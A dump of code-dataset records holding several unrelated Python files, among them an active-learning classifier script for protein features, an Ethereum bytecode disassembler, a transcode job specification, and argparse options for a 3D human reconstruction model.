fp)\r\n\r\n return acc, recall, precision, f1, auc\r\n\r\n\r\n\r\ndef rand_sampling(X_pool, y_pool, X_test, y_test, model, model_args, add_n=2, n_init=50, steps=None, verbose=0,\r\n threshold=0.7):\r\n \"\"\"random selection with pool based sampling by random\r\n Parameters\r\n ----------\r\n X_pool : numpy.array\r\n Features in pool\r\n y_pool : numpy.array\r\n Labels in pool\r\n X_test : numpy.array\r\n Features in test\r\n y_test : numpy.array\r\n Labels in test\r\n model : sklearn.model\r\n Sklearns implementation of a model,\r\n MLPClassifier,KNeighborsClassifier,AdaBoostClassifier or label_propagation\r\n model_args : dict\r\n Argumnts for model function\r\n add_n : int, optional\r\n How many samples to add at each iteration, by default 1\r\n n_init : int, optional\r\n How many samples from pool are in the training data in the first iteration, by default 10\r\n steps : int, optional\r\n Number of iterations to run. If None, then run until all samples from pool have been used or if threshold given, stop when threshold is reached, by default None\r\n verbose : int, optional\r\n If 1, print test performance in each iteration, by default 0\r\n threshold : float, optional\r\n If given, stop learning system if accuracy score on test set is >= threshold, by default 0.7\r\n Returns\r\n -------\r\n clf : sklearn.model\r\n Trained classifier\r\n test_acc, test_recall, test_precision, test_f1: lists\r\n Performance measures on test set at each iteration\r\n \"\"\"\r\n\r\n # mix up order of pool indexes\r\n order = np.random.permutation(range(len(X_pool)))\r\n\r\n # initialize poolidxs\r\n poolidxs = np.arange(len(X_pool))\r\n\r\n # take n_init samples from pool as training set\r\n # print(order)\r\n trainset = order[:n_init]\r\n # print(trainset)\r\n X_train = X_pool[trainset]\r\n y_train = y_pool[trainset]\r\n\r\n print(model)\r\n # remove the first n_init idxs from poolidxs\r\n poolidxs = np.setdiff1d(poolidxs, trainset)\r\n\r\n # initialize model\r\n clf = model(**model_args)\r\n\r\n if steps is None:\r\n steps = len(poolidxs) // 1\r\n\r\n\r\n\r\n # training loop\r\n test_acc, test_recall, test_precision, test_f1, AUC = [], [], [], [],[]\r\n for i in range(steps):\r\n count = 0\r\n # fit model\r\n clf.fit(X_train, y_train.ravel())#.ravel()\r\n\r\n # calculate performance on test set\r\n y_pred = clf.predict(X_test)\r\n\r\n\r\n test_num=len(X_test)\r\n acc, recall, precision, f1, auc = calc_performance(y_test=y_test, pred_y=y_pred,test_num=test_num)\r\n test_acc.append((len(X_train), acc))\r\n # test_recall.append((len(X_train), recall))\r\n test_precision.append((len(X_train), precision))\r\n # test_f1.append((len(X_train), f1))\r\n\r\n # calculate label probabilities for samples remaining in pool\r\n y_prob = clf.predict_proba(X_pool[poolidxs])\r\n\r\n new_order = np.random.permutation(range(len(y_prob)))\r\n new_idx = new_order[:add_n]\r\n\r\n X_add = X_pool[new_idx]\r\n y_add = y_pool[new_idx]\r\n\r\n X_train = np.concatenate((\r\n X_train,\r\n X_add\r\n ))\r\n y_train = np.concatenate((\r\n y_train,\r\n y_add\r\n ))\r\n\r\n\r\n # remove from pool\r\n poolidxs = np.setdiff1d(poolidxs, new_idx)\r\n\r\n if verbose == 1:\r\n print(f\"Step {i + 1}/{steps}: Test accuracy: {acc:.3f}\", end='\\r')\r\n\r\n if threshold is not None and acc >= threshold:\r\n print(\"Desired accuracy reached. Stopping training.\")\r\n break\r\n # if steps % 3 == 0:\r\n\r\n # np.savetxt(\"result.txt\", X_train)\r\n count+=1\r\n # show(X_train, y_train, X_test, y_pred,count)\r\n\r\n return clf, test_acc, test_recall, test_precision, test_f1\r\n\r\n\r\ndef train(X, y, split_func, sampling_func, add_n, steps=30, model=label_propagation.LabelSpreading, model_args={}, split_args={}):\r\n\r\n\r\n X_train, X_test, y_train, y_test = split_func(X, y, **split_args)\r\n\r\n _, test_acc, test_recall, test_precision, test_f1 = rand_sampling(\r\n X_pool=X_train,\r\n X_test=X_test,\r\n y_pool=y_train,\r\n y_test=y_test,\r\n model=model,\r\n model_args=model_args,\r\n verbose=1,\r\n add_n=add_n,\r\n n_init=add_n,\r\n threshold=None,\r\n steps=30\r\n )\r\n\r\n return test_acc, test_recall, test_precision, test_f1\r\n\r\n\r\ndef dd():\r\n return defaultdict(dict)\r\n\r\n\r\ndef show(Mat_Label, labels, Mat_Unlabel, unlabel_data_labels,count):\r\n plt.style.use('ggplot')\r\n for i in range(Mat_Label.shape[0]):\r\n\r\n if int(labels[i]) == 0:\r\n line1=plt.plot(Mat_Label[i, 0], Mat_Label[i, 1], 'Dm',markersize=4,)\r\n\r\n elif int(labels[i]) == 1:\r\n line2=plt.plot(Mat_Label[i, 0], Mat_Label[i, 1], 'Db',markersize=4)\r\n # plt.legend()\r\n # else:\r\n # plt.plot(Mat_Label[i, 0], Mat_Label[i, 1], 'Dy')\r\n\r\n for i in range(Mat_Unlabel.shape[0]):\r\n if int(unlabel_data_labels[i]) == 0:\r\n plt.plot(Mat_Unlabel[i, 0], Mat_Unlabel[i, 1], 'om',markersize=4,)\r\n # plt.legend()\r\n elif int(unlabel_data_labels[i]) == 1:\r\n plt.plot(Mat_Unlabel[i, 0], Mat_Unlabel[i, 1], 'ob',markersize=4)\r\n # plt.legend()\r\n # else:\r\n # plt.plot(Mat_Unlabel[i, 0], Mat_Unlabel[i, 1], 'oy',markersize=4)\r\n\r\n\r\n plt.xlabel('X1')\r\n plt.ylabel('X2')\r\n # plt.legend(handles=[line1,line2,line3,line4],labels=['label(0)', 'label(1)','ulabel(0)','ulabel(1)'])\r\n\r\n plt.xlim(-0.05, 0.25)\r\n plt.ylim(-0.07, 0.05)\r\n plt.rcParams['savefig.dpi'] = 300\r\n # plt.savefig(\"C:\\\\Users\\\\86151\\\\Desktop\\\\2021\\\\picture\\\\san\\\\temp{}.jpg\".format(count))\r\n # plt.savefig(\"D:/figures/temp{}.png\".format(i))\r\n\r\n plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n args = parse_args()\r\n\r\n # load files\r\n\r\n label, pto = data.read_sequence()\r\n\r\n aac = data.fe()\r\n\r\n dpc = data.DPC()\r\n # pca = PCA(n_components=100)\r\n # pca = pca.fit(dpc)\r\n # dpc= pca.transform(dpc)\r\n # dpc= np.array(dpc)\r\n\r\n # gaac=data.gaac()\r\n\r\n pcp = data.PC_PseAAC()\r\n\r\n bpf = data.get_bpf()\r\n\r\n\r\n\r\n X = np.concatenate((bpf,pcp,aac,dpc), axis=1)\r\n # X=pcp\r\n # print(X.shape)\r\n # pca = PCA(n_components=300)\r\n # pca = pca.fit(X)\r\n # X = pca.transform(X)\r\n # X = np.array(X)\r\n\r\n y = label\r\n\r\n X=np.array(X,dtype=np.float32)\r\n y=np.array(y,dtype=np.float32)\r\n\r\n\r\n # parameter settings for classifiers\r\n models = {\r\n\r\n 'Neural Network': {\r\n 'model': MLPClassifier,\r\n 'model_args': {\r\n 'max_iter': 1000,\r\n 'random_state' :0\r\n }\r\n },\r\n 'AdaBoostClassifier':{\r\n 'model':AdaBoostClassifier,\r\n 'model_args': {\r\n 'n_estimators': 200,\r\n 'learning_rate': 0.01,\r\n 'random_state': 100\r\n\r\n }\r\n },\r\n 'label_propagation':{\r\n 'model':label_propagation.LabelSpreading,\r\n 'model_args': {\r\n 'gamma':0.25,\r\n 'max_iter':15\r\n }\r\n },\r\n\r\n 'KNeighborsClassifier':{\r\n 'model':KNeighborsClassifier,\r\n 'model_args':{\r\n 'n_neighbors' : 8\r\n\r\n }\r\n }\r\n\r\n }\r\n\r\n # functions and settings for data splitters\r\n split_funcs = [train_test_split_rand]\r\n split_args = {\r\n 'Random': [{}],\r\n }\r\n split_keys = ['Random']\r\n\r\n # dict to store results in\r\n res = defaultdict(dd)\r\n\r\n # test each combination\r\n for model_name, model_settings in models.items():\r\n for split_func, split_key in zip(split_funcs, split_keys):\r\n for split_arg in split_args[split_key]:\r\n\r\n split_label = split_key\r\n if 'Random positive sampling' == split_key:\r\n split_label = split_key.replace('Random', f\"{split_arg['pos_frac'] * 100}%\")\r\n\r\n for i in range(15): # repeat 15 times\r\n print(f\"{model_name} {split_label} - iteration: {i + 1}/5\")\r\n\r\n # set random seed\r\n random.seed()\r\n\r\n test_acc, test_recall, test_precision, test_f1 = train(\r\n X=X,\r\n y=y,\r\n split_func=split_func,\r\n sampling_func=rand_sampling,\r\n add_n=args.add_n,\r\n model=model_settings['model'],\r\n model_args=model_settings['model_args'],\r\n split_args=split_arg\r\n )\r\n\r\n res[model_name][split_label][i] = {\r\n # 'test_acc': test_acc,\r\n 'test_recall': test_recall,\r\n 'test_precision': test_precision,\r\n 'test_f1': test_f1\r\n }\r\n\r\n # dump result dict in a pickled file\r\n with open('results.pkl', 'wb') as dest:\r\n pickle.dump(res, dest)","sub_path":"SLPM.py","file_name":"SLPM.py","file_ext":"py","file_size_in_byte":12956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"230802976","text":"from mythril.ether import asm,util\nimport os\nimport json\n\n\nclass Disassembly:\n\n def __init__(self, code):\n self.instruction_list = asm.disassemble(util.safe_decode(code))\n self.xrefs = []\n self.func_to_addr = {}\n self.addr_to_func = {}\n\n # Parse jump table & resolve function names\n\n script_dir = os.path.dirname(os.path.realpath(__file__))\n signature_file = os.path.join(script_dir, 'signatures.json')\n\n with open(signature_file) as f:\n signatures = json.load(f)\n\n jmptable_indices = asm.find_opcode_sequence([\"PUSH4\", \"EQ\"], self.instruction_list)\n\n for i in jmptable_indices:\n func_hash = self.instruction_list[i]['argument']\n try:\n func_name = signatures[func_hash]\n except KeyError:\n func_name = \"_function_\" + func_hash\n\n try:\n offset = self.instruction_list[i+2]['argument']\n jump_target = int(offset, 16)\n\n self.func_to_addr[func_name] = jump_target\n self.addr_to_func[jump_target] = func_name\n except:\n continue\n\n\n\n def get_easm(self):\n\n return asm.instruction_list_to_easm(self.instruction_list)\n","sub_path":"mythril/disassembler/disassembly.py","file_name":"disassembly.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251060724","text":"from __future__ import annotations\n\nfrom media_platform.job.job import Job\nfrom media_platform.job.specification import Specification\nfrom media_platform.job.transcode.audio_qualities import AudioQuality\nfrom media_platform.job.transcode.clipping import Clipping\nfrom media_platform.job.transcode.stream_specification import StreamSpecification\nfrom media_platform.job.transcode.video_qualities import VideoQualityRange, VideoQuality\nfrom media_platform.service.destination import Destination\n\n\nclass TranscodeSpecification(Specification):\n def __init__(self, destination: Destination, video: StreamSpecification = None, audio: StreamSpecification = None,\n quality_range: VideoQualityRange = None, quality: AudioQuality or VideoQuality = None,\n clipping: Clipping = None):\n self.destination = destination\n self.video = video\n self.audio = audio\n self.quality_range = quality_range\n self.quality = quality\n self.clipping = clipping\n\n @classmethod\n def deserialize(cls, data: dict) -> TranscodeSpecification:\n destination = Destination.deserialize(data['destination'])\n\n video_data = data.get('video')\n video = StreamSpecification.deserialize(video_data) if video_data else None\n\n audio_data = data.get('audio')\n audio = StreamSpecification.deserialize(audio_data) if audio_data else None\n\n quality_range_data = data.get('qualityRange')\n quality_range = VideoQualityRange.deserialize(quality_range_data) if quality_range_data else None\n\n quality = data.get('quality')\n\n clipping_data = data.get('clipping')\n clipping = Clipping.deserialize(clipping_data) if clipping_data else None\n\n return TranscodeSpecification(destination, video, audio, quality_range, quality, clipping)\n\n def serialize(self) -> dict:\n return {\n 'destination': self.destination.serialize(),\n 'video': self.video.serialize() if self.video else None,\n 'audio': self.audio.serialize() if self.audio else None,\n 'qualityRange': self.quality_range.serialize() if self.quality_range else None,\n 'quality': self.quality,\n 'clipping': self.clipping.serialize() if self.clipping else None\n }\n\n def validate(self):\n stream_specified = (self.video or self.audio)\n quality_specified = (self.quality_range or self.quality)\n\n if self.quality_range:\n self.quality_range.validate()\n\n if self.video:\n self.video.validate()\n\n if self.audio:\n self.video.validate()\n\n if stream_specified and quality_specified:\n raise ValueError('Either stream specification or quality may be specified, not both')\n\n if self.quality_range and self.quality:\n raise ValueError('Either quality range or quality may be specified, not both')\n\n if self.quality and not VideoQuality.has_value(self.quality) and not AudioQuality.has_value(self.quality):\n raise ValueError('Quality %s is not supported' % self.quality)\n\n if not stream_specified and not quality_specified and not self.clipping:\n raise ValueError('Either video, audio, quality range, quality or clipping must be specified')\n\n\nclass TranscodeJob(Job):\n type = 'urn:job:av.transcode'\n specification_type = TranscodeSpecification\n","sub_path":"media_platform/job/transcode_job.py","file_name":"transcode_job.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"295506981","text":"from typing import List\nimport operator\nimport numpy as np\n\n\"\"\"\n有效的字母异位词\n\"\"\"\n\n\nclass Solution:\n def isAnagram_1(self, s: str, t: str) -> bool:\n \"\"\"\n 可实现,但是时间复杂度较高,超出时间\n :param s:\n :param t:\n :return:\n \"\"\"\n if len(s) != len(t):\n return False\n t_b = [True]*len(t)\n b = False\n for i in s:\n for j_pos, j in enumerate(t):\n if t_b[j_pos]:\n if i == j:\n b = True\n t_b[j_pos] = False\n break\n if not b:\n return b\n if np.sum(np.array(t_b) == 1) == 0:\n return True\n else:\n return False\n\n def isAnagram_2(self, s: str, t: str) -> bool:\n \"\"\"\n 根据26个字母的位置,记录个数,在s中字母记录加1 ,在t中的字母减1 ;\n :param s:\n :param t:\n :return:\n \"\"\"\n if len(s) != len(t):\n return False\n l_str = [0]*26\n for i in s:\n l_str[ord(i)-97] += 1\n for j in t:\n l_str[ord(j)-97] -= 1\n\n if np.sum(np.array(l_str) == 0) == 26:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n s = \"rat\"\n t = \"tar\"\n solution = Solution()\n print(solution.isAnagram_2(s, t))\n","sub_path":"Week_08/week_08_isAnagram.py","file_name":"week_08_isAnagram.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"393163565","text":"import argparse\nimport json, os\n\nclass BaseOptions():\n def __init__(self):\n self.initialized = False\n\n def initialize(self, parser):\n # Datasets related\n g_data = parser.add_argument_group('Data')\n g_data.add_argument('--dataroot', type=str, default='./data', help='path to images (data folder)')\n g_data.add_argument('--tensorboard_path', type=str, default='./trainedModels/logs_pifu/', help='path to images (data folder)')\n g_data.add_argument('--loadSize', type=int, default=512, help='load size of input image')\n g_data.add_argument('--use_normal_input', action='store_true')\n\n # Experiment related\n g_exp = parser.add_argument_group('Experiment')\n g_exp.add_argument('--name', type=str, default='multiview_pifu', help='name of the experiment')\n g_exp.add_argument('--debug', action='store_true', help='debug mode or not')\n g_exp.add_argument('--num_views', type=int, default=1, help='How many views to use for multiview network.')\n g_exp.add_argument('--render_normals', action='store_true')\n g_exp.add_argument('--super_res', action='store_true')\n g_exp.add_argument(\"--regression\", action='store_true')\n\n # Training related\n g_train = parser.add_argument_group('Training')\n g_train.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2, -1 for CPU mode')\n g_train.add_argument('--num_threads', default=1, type=int, help='#threads for loading data')\n g_train.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')\n g_train.add_argument('--same_test_data', action='store_true', help='if true, always use the same test data')\n g_train.add_argument('--pin_memory', action='store_true', help='pin_memory')\n \n g_train.add_argument('--batch_size', type=int, default=1, help='input batch size')\n #g_train.add_argument('--learning_rate', type=float, default=1e-3, help='adam learning rate')\n g_train.add_argument('--learning_rate', type=float, default=1e-4, help='adam learning rate') # -4 before\n g_train.add_argument('--learning_rateC', type=float, default=1e-3, help='adam learning rate')\n g_train.add_argument('--num_epoch', type=int, default=40, help='num epoch to train')\n g_train.add_argument('--predict_normal', action='store_true')\n\n g_train.add_argument('--freq_plot', type=int, default=10, help='freqency of the error plot')\n g_train.add_argument('--freq_save', type=int, default=50, help='freqency of the save_checkpoints')\n g_train.add_argument('--freq_save_ply', type=int, default=100, help='freqency of the save ply')\n \n g_train.add_argument('--no_gen_mesh', action='store_true')\n g_train.add_argument('--no_num_eval', action='store_true')\n \n g_train.add_argument('--resume_epoch', type=int, default=-1, help='epoch resuming the training')\n g_train.add_argument('--continue_train', action='store_true', help='continue training: load the latest model')\n\n # Testing related\n g_test = parser.add_argument_group('Testing')\n g_test.add_argument('--resolution', type=int, default=256, help='# of grid in mesh reconstruction')\n g_test.add_argument('--test_folder_path', type=str, default=None, help='the folder of test image')\n\n # Sampling related\n g_sample = parser.add_argument_group('Sampling')\n g_sample.add_argument('--sigma', type=float, default=.005, help='perturbation standard deviation for positions')\n g_sample.add_argument('--reg_distance', type=float, default=.005, help='regression distance threshold')\n\n g_sample.add_argument('--sample_on_surface', default=False, action='store_true', help='Sample on surface for occ')\n g_sample.add_argument('--use_normal_loss', default=False, action='store_true', help='Use normal loss or not')\n g_sample.add_argument('--use_edge_loss', default=False, action='store_true', help='Use edge loss or not')\n g_sample.add_argument('--occ_loss_weight', type=float, default=1, help='occ loss weight')\n g_sample.add_argument('--normal_loss_weight', type=float, default=0.5, help='normal loss weight')\n g_sample.add_argument('--edge_loss_weight', type=float, default=0.25, help='edge loss weight')\n g_sample.add_argument('--num_sample_normals', type=int, default=5000, help='# of sampling points')\n g_sample.add_argument('--num_sample_inout', type=int, default=5000, help='# of sampling points')\n g_sample.add_argument('--num_sample_color', type=int, default=0, help='# of sampling points')\n\n # Model related\n g_model = parser.add_argument_group('Model')\n # General\n g_model.add_argument('--norm', type=str, default='group', help='instance normalization or batch normalization or group normalization')\n g_model.add_argument('--norm_color', type=str, default='instance',\n help='instance normalization or batch normalization or group normalization')\n\n # hg filter specify\n g_model.add_argument('--use_unet', action='store_true', help='Use a unet instead')\n g_model.add_argument('--use_gan_input', action='store_true', help='Use the input of the GAN')\n g_model.add_argument('--gan_epoch', type=int, default=135, help='GAN Epoch to be used')\n\n g_model.add_argument('--num_stack', type=int, default=2, help='# of hourglass')\n #g_model.add_argument('--num_stack', type=int, default=4, help='# of hourglass')\n g_model.add_argument('--num_hourglass', type=int, default=2, help='# of stacked layer of hourglass') #3 before\n g_model.add_argument('--skip_hourglass', action='store_true', help='skip connection in hourglass')\n g_model.add_argument('--hg_down', type=str, default='ave_pool', help='ave pool || conv64 || conv128')\n g_model.add_argument('--hourglass_dim', type=int, default='256', help='256 | 512')\n g_model.add_argument('--hourglass_dim_internal', type=int, default='128', help='256 | 512')\n g_model.add_argument('--skip_downsample', action='store_true')\n\n # Classification General\n g_model.add_argument('--mlp_type', type=str, default='conv1d', help='type of classifier to use')\n g_model.add_argument('--mlp_dim', nargs='+', default=[0, 512, 512, 256, 128, 1], type=int, help='# of dimensions of mlp')\n #g_model.add_argument('--mlp_dim', nargs='+', default=[0, 1024, 512, 256, 128, 1], type=int,help='# of dimensions of mlp')\n g_model.add_argument('--mlp_dim_color', nargs='+', default=[513, 1024, 512, 256, 128, 3],\n type=int, help='# of dimensions of color mlp')\n\n g_model.add_argument('--use_tanh', action='store_true',\n help='using tanh after last conv of image_filter network')\n\n # for train\n parser.add_argument('--random_flip', action='store_true', help='if random flip')\n parser.add_argument('--random_trans', action='store_true', help='if random flip')\n parser.add_argument('--random_scale', action='store_true', help='if random flip')\n parser.add_argument('--no_residual', action='store_true', help='no skip connection in mlp')\n parser.add_argument('--schedule', type=int, nargs='+', default=[10, 25, 60, 80],\n help='Decrease learning rate at these epochs.')\n parser.add_argument('--gamma', type=float, default=0.5, help='LR is multiplied by gamma on schedule.')\n parser.add_argument('--color_loss_type', type=str, default='l1', help='mse | l1')\n\n # for eval\n parser.add_argument('--val_test_error', action='store_true', help='validate errors of test data')\n parser.add_argument('--val_train_error', action='store_true', help='validate errors of train data')\n parser.add_argument('--gen_test_mesh', action='store_true', help='generate test mesh')\n parser.add_argument('--gen_train_mesh', action='store_true', help='generate train mesh')\n parser.add_argument('--all_mesh', action='store_true', help='generate meshs from all hourglass output')\n parser.add_argument('--num_gen_mesh_test', type=int, default=1, help='how many meshes to generate during testing')\n\n # path\n parser.add_argument('--decoder_base', type=str, default='', help='path to load a pretrained decoder')\n parser.add_argument('--checkpoints_path', type=str, default='./trainedModels', help='path to save checkpoints')\n parser.add_argument('--load_netG_checkpoint_path', type=str, default=None, help='path to save checkpoints')\n parser.add_argument('--load_netC_checkpoint_path', type=str, default=None, help='path to save checkpoints')\n parser.add_argument('--results_path', type=str, default='./generated3DModels', help='path to save results ply')\n parser.add_argument('--load_checkpoint_path', type=str, help='path to save results ply')\n parser.add_argument('--single', type=str, default='', help='single data for training')\n parser.add_argument('--max_train_size', type=int, default=-1, help='max number of training samples')\n\n #for single image reconstruction\n parser.add_argument('--img_path', type=str, help='path for input image')\n\n # aug\n group_aug = parser.add_argument_group('aug')\n group_aug.add_argument('--aug_alstd', type=float, default=0.0, help='augmentation pca lighting alpha std')\n group_aug.add_argument('--aug_bri', type=float, default=0.0, help='augmentation brightness')\n group_aug.add_argument('--aug_con', type=float, default=0.0, help='augmentation contrast')\n group_aug.add_argument('--aug_sat', type=float, default=0.0, help='augmentation saturation')\n group_aug.add_argument('--aug_hue', type=float, default=0.0, help='augmentation hue')\n group_aug.add_argument('--aug_blur', type=float, default=0.0, help='augmentation blur')\n\n # special tasks\n self.initialized = True\n\n return parser\n\n def gather_options(self):\n # initialize parser with basic options\n if not self.initialized:\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser = self.initialize(parser)\n\n self.parser = parser\n\n return parser.parse_args()\n\n def print_options(self, opt):\n message = ''\n message += '----------------- Options ---------------\\n'\n for k, v in sorted(vars(opt).items()):\n comment = ''\n default = self.parser.get_default(k)\n if v != default:\n comment = '\\t[default: %s]' % str(default)\n message += '{:>25}: {:<30}{}\\n'.format(str(k), str(v), comment)\n message += '----------------- End -------------------'\n print(message)\n\n def setNameFromOptions(self, opt):\n baseName = opt.name\n type_name = \"OCC\"\n\n if opt.predict_normal:\n type_name = \"NORMAL\"\n elif opt.render_normals:\n type_name = \"RENDER\"\n\n input_type = \"nml\" if opt.use_normal_input else \"bp\"\n if opt.use_gan_input:\n input_type = \"gan\"\n\n filter_hg = str(opt.hourglass_dim)\n sample_count = str(opt.num_sample_inout)\n nml_loss = \"nml_loss\" if opt.use_normal_loss else \"\"\n edge_loss = 'edge_loss' if opt.use_edge_loss else \"\"\n skip_ds = \"sds\" if opt.skip_downsample else \"\"\n super_res = \"superRes\" if opt.super_res else \"\"\n unet = \"unet\" if opt.use_unet else \"hg\"\n mlp_type = opt.mlp_type\n mlp_sizes = '_'.join(str(x) for x in opt.mlp_dim)\n\n return '_'.join(str(x) for x in [baseName, type_name, unet, input_type, super_res, filter_hg, sample_count,\n nml_loss, edge_loss, skip_ds, mlp_type])\n\n def saveOptToFile(self, opt):\n savePath = '%s/%s/options.txt' % (opt.checkpoints_path, opt.name)\n with open(savePath, \"w\") as f:\n json.dump(opt.__dict__, f, indent=2)\n\n print(\"Saved options to {0}\".format(savePath))\n\n def loadOptFromFile(self, name, checkPointsPath = \"./trainedModels\"):\n loadPath = '%s/%s/options.txt' % (checkPointsPath, name)\n\n if os.path.exists(loadPath):\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser = self.initialize(parser)\n opt = parser.parse_args(\"\")\n\n with open(loadPath, 'r') as f:\n opt.__dict__ = json.load(f)\n\n return opt\n else:\n return None\n\n def parse(self):\n opt = self.gather_options()\n\n #Set first mlp dim according to filter sizes\n if opt.use_unet:\n opt.mlp_dim[0] = 512+3\n else:\n opt.mlp_dim[0] = opt.hourglass_dim * opt.num_views + 3\n\n #if opt.super_res:\n # opt.mlp_dim[0] = opt.mlp_dim[0] + opt.hourglass_dim//2 * opt.num_views\n\n if opt.predict_normal:\n opt.mlp_dim[-1] = 3\n\n #if opt.max_train_size != -1:\n #opt.no_gen_mesh = True\n\n opt.name = self.setNameFromOptions(opt)\n return opt\n","sub_path":"lib/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":13358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"217962541","text":"import pickle\nimport numpy as np\nfrom scipy.stats import wilcoxon\n\nfrom evaluator.evaluate_crowdflower_results import options, CFResults, read_search_results, calculate_kendalls_taus, \\\n algorithm_order, algorithm_abbreviations\n\n\ndef calc_invalid_treatment_significance():\n cache_include = options['include_invalid_in_kendalls_tau']\n cache_relevance = options['kendalls_tau_invalid_relevance']\n cf_results = CFResults()\n search_results = read_search_results()\n options['include_invalid_in_kendalls_tau'] = False\n tau_results_remove = calculate_kendalls_taus(cf_results, search_results)\n options['include_invalid_in_kendalls_tau'] = True\n options['kendalls_tau_invalid_relevance'] = 1.5\n tau_results_set_medium = calculate_kendalls_taus(cf_results, search_results)\n options['kendalls_tau_invalid_relevance'] = 0\n tau_results_set_low = calculate_kendalls_taus(cf_results, search_results)\n options['include_invalid_in_kendalls_tau'] = cache_include\n options['kendalls_tau_invalid_relevance'] = cache_relevance\n\n for alg in algorithm_order:\n remove = []\n medium = []\n low = []\n for pair in tau_results_remove[algorithm_abbreviations[alg]]['per_query']:\n remove.append(pair[1])\n for pair2 in tau_results_set_medium[algorithm_abbreviations[alg]]['per_query']:\n if pair2[0] == pair[0]:\n medium.append(pair2[1])\n for pair3 in tau_results_set_low[algorithm_abbreviations[alg]]['per_query']:\n if pair3[0] == pair[0]:\n low.append(pair3[1])\n print(alg)\n print(wilcoxon(remove, medium))\n print(wilcoxon(remove, low))\n print(wilcoxon(low, medium))\n\n\ndef calc_algorithm_significane():\n ndcg_dict = pickle.load(open(\"obj/ndcg_dict.pkl\", \"rb\"))\n\n # Read query list\n queries = list(ndcg_dict[0]['ndcg_per_algorithm_dict'][algorithm_order[0]]['query_ndcg_dict'].keys())\n queries.remove('kingdom hearts 2')\n queries.sort()\n\n # Init Wilcoxon dict\n wilcoxon_dict = [{'k': k, 'matrix':None, 'algorithms': {a:[] for a in algorithm_order}} for k in range(0, 10)]\n\n # Read NDCGs\n for k in range(0, 10):\n ndcg_per_algorithm_dict = ndcg_dict[k]['ndcg_per_algorithm_dict']\n\n for algorithm in algorithm_order:\n algorithm_dict = ndcg_per_algorithm_dict[algorithm]\n algorithm_queries_dict = algorithm_dict['query_ndcg_dict']\n\n for query in queries:\n wilcoxon_dict[k]['algorithms'][algorithm].append(algorithm_queries_dict[query])\n\n # Calc Wilcoxon matrices\n for k in wilcoxon_dict:\n k = k['k']\n wilcoxon_matrix = np.empty((len(algorithm_order),len(algorithm_order)))\n for a in algorithm_order:\n for b in algorithm_order:\n p = wilcoxon(wilcoxon_dict[k]['algorithms'][a],wilcoxon_dict[k]['algorithms'][b]).pvalue\n wilcoxon_matrix[algorithm_order.index(a)][algorithm_order.index(b)] = p\n\n wilcoxon_dict[k]['matrix'] = wilcoxon_matrix\n\n # Print wanted significance\n algorithm_a = 'tfidf-link_pagerank-harmonic_mean_with_weighted_pr'\n algorithm_b = 'tfidf-combined_bl_pagerank-harmonic_mean_with_weighted_pr'\n for k in wilcoxon_dict:\n k = k['k']\n print('k = {}'.format(k+1))\n p = wilcoxon_dict[k]['matrix'][algorithm_order.index(algorithm_a)][algorithm_order.index(algorithm_b)]\n print(p)\n\n print('Median {}: {}'.format((algorithm_a),np.median(wilcoxon_dict[k]['algorithms'][algorithm_a])))\n print('Median {}: {}'.format((algorithm_b),np.median(wilcoxon_dict[k]['algorithms'][algorithm_b])))\n\n","sub_path":"questionnaire-evaluator/evaluator/significance.py","file_name":"significance.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"11050700","text":"def d_to_b(num,n):\n bi = [] \n while num > 0 :\n bi.append(num%2)\n num = num//2\n\n while len(bi) < n:\n bi.append(0)\n\n return bi\n\ndef print_bit(bi):\n for i in bi[::-1] :\n print(i,end=' ')\n\nn = int(input())\n\nfor i in range(2**n) :\n print_bit(d_to_b(i,n))\n print()","sub_path":"Algo201/problem_of_the_class/python/bit_but_iterlation.py","file_name":"bit_but_iterlation.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"4297691","text":"from .logger import set_logger\nfrom sklearn import preprocessing\nfrom ..utils import shaping_utils\nimport numpy as np\n\n\ndef preprocess_dataset(X, Y, n_steps):\n '''\n Return preprocessed dataset from raw dataset.\n Returns:\n - dataset (list): X (np.arr), Y (np.arr)\n '''\n\n set_logger.info(\"Starting preprocessing...\")\n\n return preprocess_features(\n *preprocess_labels(*segment_sequences(X, Y, n_steps)))\n\n\ndef preprocess_features(X, Y):\n '''\n Scale the feature vectors using scikit preprocessing.\n '''\n\n X = np.array(X, dtype=np.float32)\n old_shape = X.shape\n X = X.reshape((-1, X.shape[2]))\n assert(len(X.shape) == 2) # Double check that X is 2d.\n\n X = preprocessing.maxabs_scale(X, copy=False)\n X = X.reshape(old_shape)\n return X, Y\n\n\ndef preprocess_labels(X, Y):\n '''\n Numpify labels.\n '''\n\n return X, np.array(Y, dtype=np.float32)\n\n\ndef segment_sequences(X, Y, n_steps):\n \"\"\"\n Segment sequence features into segments of uniform length.\n \"\"\"\n\n new_X = []\n new_Y = []\n\n for i in range(len(X)):\n segments = shaping_utils.segment_vector(np.array(X[i]), n_steps)\n new_X += segments\n new_Y += len(segments) * [Y[i]]\n\n set_logger.debug(\"Sequence segmentation complete.\")\n set_logger.debug(\"Average segments per sequence: \" +\n str(len(new_X) / len(X)))\n\n return np.array(new_X), 